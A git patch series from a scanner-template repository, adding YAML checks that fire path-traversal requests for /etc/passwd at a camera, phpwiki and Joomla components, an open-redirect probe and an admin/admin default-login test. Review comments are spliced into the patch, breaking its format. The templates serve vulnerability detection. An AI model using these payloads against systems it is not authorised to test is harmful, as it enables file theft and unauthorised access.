From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Tue, 7 Sep 2021 18:52:09 +0900
Subject: [PATCH 087/339] =?UTF-8?q?Create=20CVE-2018=E2=80=9314064.yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 CVE-2018–14064.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 CVE-2018–14064.yaml
diff --git a/CVE-2018–14064.yaml b/CVE-2018–14064.yaml
new file mode 100644
index 0000000000..68796ed2a0
--- /dev/null
+++ b/CVE-2018–14064.yaml
@@ -0,0 +1,26 @@
+id: cve-2018-14064
+
+info:
+ name: VelotiSmart Wifi - Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ reference: |
+ - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
+ - https://www.exploit-db.com/exploits/45030
+ tags: velotismart,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
From 4da291ef6d71c2ba05d7136f3c0a63bb7726d7c3 Mon Sep 17 00:00:00 2001
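Review bot: The file name `CVE-2018–14064.yaml` contains an en dash (U+2013) instead of a hyphen, which is why the subject line is MIME-encoded, and the `id` is lowercase `cve-2018-14064` while the neighbouring CVE templates use the `CVE-YYYY-NNNN` form; the later move to `cves/2018/` keeps the en dash, so the path and the id will not agree under tooling that derives one from the other. `reference: |` turns the two URLs into a single literal string with `- ` prefixes rather than a YAML list; write it as `reference:` followed by the two `- https://...` items, as the Joomla templates in this series do. The `tags` also lack `cve,cve2018`, and the template has no `description`.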
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Tue, 7 Sep 2021 18:54:45 +0900
Subject: [PATCH 088/339] Create phpwiki-lfi.yaml
---
 phpwiki-lfi.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 phpwiki-lfi.yaml
diff --git a/phpwiki-lfi.yaml b/phpwiki-lfi.yaml
new file mode 100644
index 0000000000..d48b733698
--- /dev/null
+++ b/phpwiki-lfi.yaml
@@ -0,0 +1,24 @@
+id: phpwiki-lfi
+
+info:
+ name: phpwiki 1.5.4 - XSS / Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ reference: https://www.exploit-db.com/exploits/38027
+ tags: phpwiki,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/phpwiki/index.php/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
From 4aa8c2f4eef6223ceed843ad0ba615523acc52c1 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Tue, 7 Sep 2021 18:57:06 +0900
Subject: [PATCH 089/339] Create homeautomation-v3-openredirect.yaml
---
 homeautomation-v3-openredirect.yaml | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 homeautomation-v3-openredirect.yaml
diff --git a/homeautomation-v3-openredirect.yaml b/homeautomation-v3-openredirect.yaml
new file mode 100644
index 0000000000..f0a3bda1d4
--- /dev/null
+++ b/homeautomation-v3-openredirect.yaml
@@ -0,0 +1,19 @@
+id: homeautomation-v3-openredirect
+
+info:
+ name: HomeAutomation v3.3.2 Open Redirect
+ author: 0x_Akoko
+ reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php
+ severity: medium
+ tags: homeautomation,redirect
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
From 7a518df21be12293dc47f6a628561933d9e091f4 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Tue, 7 Sep 2021 18:13:12 +0700
Subject: [PATCH 090/339] Create CVE-2010-1607.yaml
---
 cves/2010/CVE-2010-1607.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 cves/2010/CVE-2010-1607.yaml
diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml
new file mode 100644
index 0000000000..81f69a9578
--- /dev/null
+++ b/cves/2010/CVE-2010-1607.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1607
+
+info:
+ name: Joomla! Component WMI 1.5.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12316
+ - https://www.cvedetails.com/cve/CVE-2010-1607
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From f5358eaf1928c5d12c901075ad6745a69e97f330 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 7 Sep 2021 17:57:11 +0530
Subject: [PATCH 091/339] Update homeautomation-v3-openredirect.yaml
---
 homeautomation-v3-openredirect.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/homeautomation-v3-openredirect.yaml b/homeautomation-v3-openredirect.yaml
index f0a3bda1d4..a34fdd4b47 100644
--- a/homeautomation-v3-openredirect.yaml
+++ b/homeautomation-v3-openredirect.yaml
@@ -5,7 +5,7 @@ info: author: 0x_Akoko reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php severity: medium - tags: homeautomation,redirect + tags: iot,redirect requests: - method: GET From 72e74197323dbafd7d98c9e3bd9866ae1ccd8f18 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Sep 2021 17:58:44 +0530 Subject: [PATCH 092/339] Update homeautomation-v3-openredirect.yaml --- homeautomation-v3-openredirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/homeautomation-v3-openredirect.yaml b/homeautomation-v3-openredirect.yaml index a34fdd4b47..9388597d8d 100644 --- a/homeautomation-v3-openredirect.yaml +++ b/homeautomation-v3-openredirect.yaml @@ -3,8 +3,8 @@ id: homeautomation-v3-openredirect info: name: HomeAutomation v3.3.2 Open Redirect author: 0x_Akoko - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php severity: medium + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php tags: iot,redirect requests: From 9b754866163fd26a4dead3635c9d57fb7bfe0411 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Sep 2021 18:07:48 +0530 Subject: [PATCH 093/339] Rename homeautomation-v3-openredirect.yaml to vulnerabilities/other/homeautomation-v3-openredirect.yaml --- .../other/homeautomation-v3-openredirect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename homeautomation-v3-openredirect.yaml => vulnerabilities/other/homeautomation-v3-openredirect.yaml (100%) diff --git a/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml similarity index 100% rename from homeautomation-v3-openredirect.yaml rename to vulnerabilities/other/homeautomation-v3-openredirect.yaml From ef6350bfcc2767f967fe16efd8fa80de21798af6 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Tue, 7 Sep 2021 18:14:38 +0530 Subject: [PATCH 094/339] =?UTF-8?q?Update=20and=20rename=20CVE-2018?= =?UTF-8?q?=E2=80=9314064.yaml=20to=20cves/2018/CVE-2018=E2=80=9314064.yam?= =?UTF-8?q?l?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- CVE-2018–14064.yaml | 26 -------------------------- cves/2018/CVE-2018–14064.yaml | 28 ++++++++++++++++++++++++++++ 2 files changed, 28 insertions(+), 26 deletions(-) delete mode 100644 CVE-2018–14064.yaml create mode 100644 cves/2018/CVE-2018–14064.yaml diff --git a/CVE-2018–14064.yaml b/CVE-2018–14064.yaml deleted file mode 100644 index 68796ed2a0..0000000000 --- a/CVE-2018–14064.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: cve-2018-14064 - -info: - name: VelotiSmart Wifi - Directory Traversal - author: 0x_Akoko - severity: high - reference: | - - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - - https://www.exploit-db.com/exploits/45030 - tags: velotismart,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/cves/2018/CVE-2018–14064.yaml b/cves/2018/CVE-2018–14064.yaml new file mode 100644 index 0000000000..ddac97cab7 --- /dev/null +++ b/cves/2018/CVE-2018–14064.yaml 
@@ -0,0 +1,28 @@ +id: CVE-2018-14064 + +info: + name: VelotiSmart Wifi - Directory Traversal + author: 0x_Akoko + severity: high + description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. + reference: + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 + tags: cve,cve2018,lfi,camera,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From ded0c4de57a667fb0d67f2bc7c21cb8bf5f68999 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 21:31:35 +0530 Subject: [PATCH 095/339] Removing takeover templates with no actual impact --- takeovers/acquia-takeover.yaml | 21 --------------------- takeovers/ceros-takeover.yaml | 23 ----------------------- takeovers/fastly-takeover.yaml | 18 ------------------ takeovers/freshservice-takeover.yaml | 21 --------------------- takeovers/landingi-takeover.yaml | 20 -------------------- takeovers/medium-takeover.yaml | 20 -------------------- takeovers/smartling-takeover.yaml | 17 ----------------- takeovers/vercel-takeover.yaml | 20 -------------------- 8 files changed, 160 deletions(-) delete mode 100644 takeovers/acquia-takeover.yaml delete mode 100644 takeovers/ceros-takeover.yaml delete mode 100644 takeovers/fastly-takeover.yaml delete mode 100644 takeovers/freshservice-takeover.yaml delete mode 100644 takeovers/landingi-takeover.yaml delete mode 100644 takeovers/medium-takeover.yaml delete mode 100644 takeovers/smartling-takeover.yaml delete mode 100644 takeovers/vercel-takeover.yaml diff --git a/takeovers/acquia-takeover.yaml b/takeovers/acquia-takeover.yaml deleted file mode 100644 index 3740c22e91..0000000000 
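Review bot: The dot-segments in `{{BaseURL}}/../../etc/passwd` are the entire exploit, and URL-aware HTTP clients commonly collapse `/../` before the request leaves, in which case the target receives `GET /etc/passwd` and the template silently never tests the traversal. If the `path:` mode normalises here (I can't tell from this file), the request should be sent as a raw request with `unsafe: true` so the bytes reach the wire intact; either way a comment above `path:` such as `# traversal must reach the target un-normalised; do not "fix" the ../` would stop the next editor from cleaning it. The matcher pairing `root:[x*]:0:0` with status 200 is fine for this purpose.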
--- a/takeovers/acquia-takeover.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: acquia-takeover - -info: - name: Acquia Takeover Detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - name: acquia - words: - - If you are an Acquia Cloud customer and expect to see your site at this address - - The site you are looking for could not be found. - condition: and \ No newline at end of file diff --git a/takeovers/ceros-takeover.yaml b/takeovers/ceros-takeover.yaml deleted file mode 100644 index f39d129637..0000000000 --- a/takeovers/ceros-takeover.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: ceros-takeover - -info: - name: ceros takeover detection - author: abison_binoy - severity: info - tags: takeover - reference: - - https://twitter.com/abison_binoy/status/1412606224030339072 - - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/ - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - "Sorry, page not found" - - "Please check the url and" - - "/view.ceros.com/" - condition: and diff --git a/takeovers/fastly-takeover.yaml b/takeovers/fastly-takeover.yaml deleted file mode 100644 index 4b606dfab2..0000000000 --- a/takeovers/fastly-takeover.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: fastly-takeover - -info: - name: fastly takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/22 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - "Fastly error: unknown domain:" \ No newline at end of file diff --git a/takeovers/freshservice-takeover.yaml b/takeovers/freshservice-takeover.yaml deleted file mode 100644 index f8365be078..0000000000 --- a/takeovers/freshservice-takeover.yaml +++ /dev/null 
@@ -1,21 +0,0 @@ -id: freshservice-takeover - -info: - name: freshservice takeover detection - author: philippedelteil - severity: info - tags: takeover - reference: https://twitter.com/secuaudit/status/1142514805590433793 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - 'There is no helpdesk here!' - - 'Maybe this is still fresh!' - - 'freshservice.com' - condition: and \ No newline at end of file diff --git a/takeovers/landingi-takeover.yaml b/takeovers/landingi-takeover.yaml deleted file mode 100644 index 2514cf4e17..0000000000 --- a/takeovers/landingi-takeover.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: landingi-takeover - -info: - name: landingi takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - It looks like you're lost - - The page you are looking for is not found - condition: and \ No newline at end of file diff --git a/takeovers/medium-takeover.yaml b/takeovers/medium-takeover.yaml deleted file mode 100644 index 4303e7125a..0000000000 --- a/takeovers/medium-takeover.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: medium-takeover - -info: - name: Medium Takeover Detection - author: rtcms - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/206 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - Oops! We couldn’t find that page - - Sorry about that - condition: and diff --git a/takeovers/smartling-takeover.yaml b/takeovers/smartling-takeover.yaml deleted file mode 100644 index 35aebde041..0000000000 --- a/takeovers/smartling-takeover.yaml +++ /dev/null 
@@ -1,17 +0,0 @@ -id: smartling-takeover - -info: - name: smartling takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/67 - -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Domain is not configured diff --git a/takeovers/vercel-takeover.yaml b/takeovers/vercel-takeover.yaml deleted file mode 100644 index cf7dabfebd..0000000000 --- a/takeovers/vercel-takeover.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: vercel-takeover - -info: - name: vercel takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/183 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - The deployment could not be found on Vercel. - - DEPLOYMENT_NOT_FOUND - condition: and \ No newline at end of file From 2500db0987a7fd2906c84e1fe208a5f9225f9db5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 21:31:50 +0530 Subject: [PATCH 096/339] misc update --- takeovers/uptimerobot-takeover.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/takeovers/uptimerobot-takeover.yaml b/takeovers/uptimerobot-takeover.yaml index 3f13c6bead..07476af51e 100644 --- a/takeovers/uptimerobot-takeover.yaml +++ b/takeovers/uptimerobot-takeover.yaml 
@@ -3,16 +3,23 @@ id: uptimerobot-takeover info: name: uptimerobot takeover detection author: pdteam - severity: info + severity: low tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + reference: + - https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/ + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/45 requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: regex regex: - - "^page not found$" \ No newline at end of file + - "^page not found$" + + - type: status + status: + - 404 \ No newline at end of file From d8b8884c607545fd7170d5284869419633a50211 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 21:38:06 +0530 Subject: [PATCH 097/339] misc update --- default-logins/druid/druid-default-password.yaml | 10 +++++----- technologies/druid-detect.yaml | 1 + 2 files changed, 6 insertions(+), 5 deletions(-) diff --git a/default-logins/druid/druid-default-password.yaml b/default-logins/druid/druid-default-password.yaml index 0696eafd4a..b4a1e28124 100644 --- a/default-logins/druid/druid-default-password.yaml +++ b/default-logins/druid/druid-default-password.yaml @@ -11,16 +11,16 @@ requests: path: - "{{BaseURL}}/druid/submitLogin" - "{{BaseURL}}/submitLogin" + body: "loginUsername=admin&loginPassword=admin" matchers-condition: and matchers: - - type: word - words: - - 'success' - part: body - condition: and - type: status status: - 200 + + - type: regex + regex: + - "^success$" \ No newline at end of file diff --git a/technologies/druid-detect.yaml b/technologies/druid-detect.yaml index 8cdd990c9e..63b0d5823e 100644 --- a/technologies/druid-detect.yaml +++ b/technologies/druid-detect.yaml @@ -18,6 +18,7 @@ requests: part: body words: - "druid monitor" + - type: status status: - 200 From a06ba7ff1a52f1420caa57e61097326fc741edce Mon Sep 17 00:00:00 2001 
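Review bot: The new `^success$` regex in druid-default-password has no `(?m)` flag, and in Go's RE2 a bare `$` matches only at the very end of the input, so a body of `success\n` or `success\r\n` no longer matches where the previous `word` matcher on `success` did; unless the endpoint is known to return the bare token with no line ending, `^\s*success\s*$` keeps the tightness without that dependency. With `part:` dropped the regex now runs against the engine's default part rather than an explicit `body`; restoring `part: body` makes the intent clear. The request's `method:` line sits above the hunk, so I can't confirm this is a POST that will actually send the new `body:`.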
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 8 Sep 2021 06:44:48 +0700 Subject: [PATCH 098/339] Create CVE-2010-1956.yaml --- cves/2010/CVE-2010-1956.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1956.yaml diff --git a/cves/2010/CVE-2010-1956.yaml b/cves/2010/CVE-2010-1956.yaml new file mode 100644 index 0000000000..a9e931f712 --- /dev/null +++ b/cves/2010/CVE-2010-1956.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1956 + +info: + name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12285 + - https://www.cvedetails.com/cve/CVE-2010-1956 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From d7bccc747e36af824a1331a7c77505045990de69 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 8 Sep 2021 07:00:32 +0700 Subject: [PATCH 099/339] Create CVE-2010-2034.yaml --- cves/2010/CVE-2010-2034.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2034.yaml diff --git a/cves/2010/CVE-2010-2034.yaml b/cves/2010/CVE-2010-2034.yaml new file mode 100644 index 0000000000..4600c605a4 --- /dev/null +++ b/cves/2010/CVE-2010-2034.yaml 
@@ -0,0 +1,27 @@ +id: CVE-2010-2034 + +info: + name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34003 + - https://www.cvedetails.com/cve/CVE-2010-2034 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 31ad69e0cac2e5ab5acde66e1ca7c8c99d354535 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 8 Sep 2021 08:10:38 +0700 Subject: [PATCH 100/339] Create eg-manager-detect.yaml --- technologies/eg-manager-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/eg-manager-detect.yaml diff --git a/technologies/eg-manager-detect.yaml b/technologies/eg-manager-detect.yaml new file mode 100644 index 0000000000..a4b158433e --- /dev/null +++ b/technologies/eg-manager-detect.yaml @@ -0,0 +1,25 @@ +id: eg-manager-detect + +info: + name: eG Manager Detect + author: pikpikcu + severity: info + tags: tech,eg + +requests: + - method: GET + path: + - "{{BaseURL}}/final/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - " eG Innovations, Inc." + - "eG Innovations, Inc. All Rights Reserved" + + - type: status + status: + - 200 From 2f110a8a557c8e1e0b0b28695b2732cbbc04bf88 Mon Sep 17 00:00:00 2001 
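Review bot: In eg-manager-detect the two `words` overlap — ` eG Innovations, Inc.` is a substring of `eG Innovations, Inc. All Rights Reserved` — and with no `condition:` the matcher is an OR, so the second entry can never change the outcome and the detection reduces to "the vendor name appears somewhere under `/final/`". Drop the redundant entry, or replace it with a marker specific to the eG Manager UI (a page title or login-form element confirmed against a live instance) and set `condition: and`, so a vendor mention on an unrelated page does not fingerprint as eG Manager. As an info-severity tech detect the loose match is tolerable, but it should be a deliberate choice noted in a comment rather than an accident of the word list.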
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 8 Sep 2021 11:28:35 +0700 Subject: [PATCH 101/339] Create daybyday-detect.yaml --- technologies/daybyday-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/daybyday-detect.yaml diff --git a/technologies/daybyday-detect.yaml b/technologies/daybyday-detect.yaml new file mode 100644 index 0000000000..15aa07c91a --- /dev/null +++ b/technologies/daybyday-detect.yaml @@ -0,0 +1,24 @@ +id: daybyday-detect + +info: + name: DaybydayCRM Detect + author: pikpikcu + severity: info + tags: tech,daybyday + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Daybyday - Login" + + - type: status + status: + - 200 From 7e601216b9905396d70d26fa8edef891fa4781aa Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 8 Sep 2021 12:58:02 +0530 Subject: [PATCH 102/339] Added additional path --- misconfiguration/aem/aem-groovyconsole.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/misconfiguration/aem/aem-groovyconsole.yaml b/misconfiguration/aem/aem-groovyconsole.yaml index b56d705f16..a2a388a6ec 100644 --- a/misconfiguration/aem/aem-groovyconsole.yaml +++ b/misconfiguration/aem/aem-groovyconsole.yaml 
@@ -5,17 +5,21 @@ info: author: Dheerajmadhukar severity: critical description: Groovy console is exposed, RCE is possible. - reference: https://hackerone.com/reports/672243 + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 tags: aem requests: - method: GET path: - "{{BaseURL}}/groovyconsole" + - "{{BaseURL}}/etc/groovyconsole.html" headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -25,6 +29,7 @@ requests: - "Groovy Web Console" part: body condition: and + - type: status status: - 200 \ No newline at end of file From 0880b652841ddb4d6087048bdbb29386681b018c Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 8 Sep 2021 13:11:41 +0530 Subject: [PATCH 103/339] =?UTF-8?q?Rename=20CVE-2018=E2=80=9314064.yaml=20?= =?UTF-8?q?to=20CVE-2018-14064.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2018/{CVE-2018–14064.yaml => CVE-2018-14064.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2018/{CVE-2018–14064.yaml => CVE-2018-14064.yaml} (100%) diff --git a/cves/2018/CVE-2018–14064.yaml b/cves/2018/CVE-2018-14064.yaml similarity index 100% rename from cves/2018/CVE-2018–14064.yaml rename to cves/2018/CVE-2018-14064.yaml From 609705f67645e2bff36ea0dd1f075151cc5771f5 Mon Sep 17 00:00:00 2001 
From: sandeep Date: Wed, 8 Sep 2021 17:47:19 +0530 Subject: [PATCH 104/339] removed extra headers not required for template --- cnvd/CNVD-2020-68596.yaml | 9 +--- cnvd/CNVD-2021-15822.yaml | 1 - cnvd/CNVD-2021-30167.yaml | 2 - cves/2009/CVE-2009-1151.yaml | 4 -- cves/2012/CVE-2012-1823.yaml | 2 - cves/2014/CVE-2014-3120.yaml | 3 -- cves/2015/CVE-2015-1427.yaml | 7 ---- cves/2016/CVE-2016-10033.yaml | 6 --- cves/2016/CVE-2016-3081.yaml | 1 - cves/2017/CVE-2017-1000486.yaml | 3 -- cves/2017/CVE-2017-10271.yaml | 3 -- cves/2017/CVE-2017-12635.yaml | 4 -- cves/2017/CVE-2017-14537.yaml | 9 +--- cves/2017/CVE-2017-15715.yaml | 6 --- cves/2017/CVE-2017-17562.yaml | 4 +- cves/2017/CVE-2017-3506.yaml | 2 - cves/2017/CVE-2017-5638.yaml | 4 -- cves/2017/CVE-2017-9506.yaml | 4 -- cves/2017/CVE-2017-9822.yaml | 4 -- cves/2017/CVE-2017-9841.yaml | 36 ---------------- cves/2018/CVE-2018-1000130.yaml | 17 +++----- cves/2018/CVE-2018-1000533.yaml | 2 - cves/2018/CVE-2018-10141.yaml | 2 - cves/2018/CVE-2018-10818.yaml | 4 -- cves/2018/CVE-2018-16167.yaml | 4 -- cves/2018/CVE-2018-16763.yaml | 1 - cves/2018/CVE-2018-17254.yaml | 1 - cves/2018/CVE-2018-18778.yaml | 2 +- cves/2018/CVE-2018-3760.yaml | 3 -- cves/2018/CVE-2018-7600.yaml | 3 -- cves/2018/CVE-2018-8715.yaml | 5 --- cves/2019/CVE-2019-1010287.yaml | 8 +--- cves/2019/CVE-2019-11869.yaml | 3 -- cves/2019/CVE-2019-13101.yaml | 2 - cves/2019/CVE-2019-15107.yaml | 7 +--- cves/2019/CVE-2019-16278.yaml | 3 -- cves/2019/CVE-2019-16920.yaml | 23 +++------- cves/2019/CVE-2019-17382.yaml | 1 - cves/2019/CVE-2019-17558.yaml | 3 -- cves/2019/CVE-2019-2616.yaml | 1 - cves/2019/CVE-2019-3396.yaml | 6 +-- cves/2019/CVE-2019-6715.yaml | 4 -- cves/2019/CVE-2019-7256.yaml | 16 ++----- cves/2019/CVE-2019-7609.yaml | 16 +++---- cves/2019/CVE-2019-9670.yaml | 1 - cves/2019/CVE-2019-9733.yaml | 10 ++--- cves/2020/CVE-2020-11978.yaml | 9 ---- cves/2020/CVE-2020-12720.yaml | 3 -- cves/2020/CVE-2020-13167.yaml | 19 ++------- 
cves/2020/CVE-2020-15568.yaml | 2 - cves/2020/CVE-2020-16139.yaml | 1 - cves/2020/CVE-2020-17505.yaml | 5 +-- cves/2020/CVE-2020-17518.yaml | 2 - cves/2020/CVE-2020-24186.yaml | 11 ----- cves/2020/CVE-2020-24579.yaml | 15 +------ cves/2020/CVE-2020-25213.yaml | 2 - cves/2020/CVE-2020-25506.yaml | 4 -- cves/2020/CVE-2020-26919.yaml | 2 - cves/2020/CVE-2020-28188.yaml | 9 +--- cves/2020/CVE-2020-28208.yaml | 3 -- cves/2020/CVE-2020-35713.yaml | 7 +--- cves/2020/CVE-2020-3580.yaml | 1 - cves/2020/CVE-2020-35951.yaml | 21 +--------- cves/2020/CVE-2020-36112.yaml | 8 ---- cves/2020/CVE-2020-5307.yaml | 2 - cves/2020/CVE-2020-5902.yaml | 14 +++---- cves/2020/CVE-2020-7796.yaml | 3 -- cves/2020/CVE-2020-7961.yaml | 9 +--- cves/2020/CVE-2020-8191.yaml | 9 +--- cves/2020/CVE-2020-8193.yaml | 24 +---------- cves/2020/CVE-2020-8194.yaml | 14 ++----- cves/2020/CVE-2020-8515.yaml | 3 -- cves/2020/CVE-2020-8813.yaml | 4 -- cves/2020/CVE-2020-9315.yaml | 2 - cves/2021/CVE-2021-1497.yaml | 2 - cves/2021/CVE-2021-20092.yaml | 4 -- cves/2021/CVE-2021-21307.yaml | 15 +------ cves/2021/CVE-2021-21389.yaml | 1 - cves/2021/CVE-2021-21975.yaml | 1 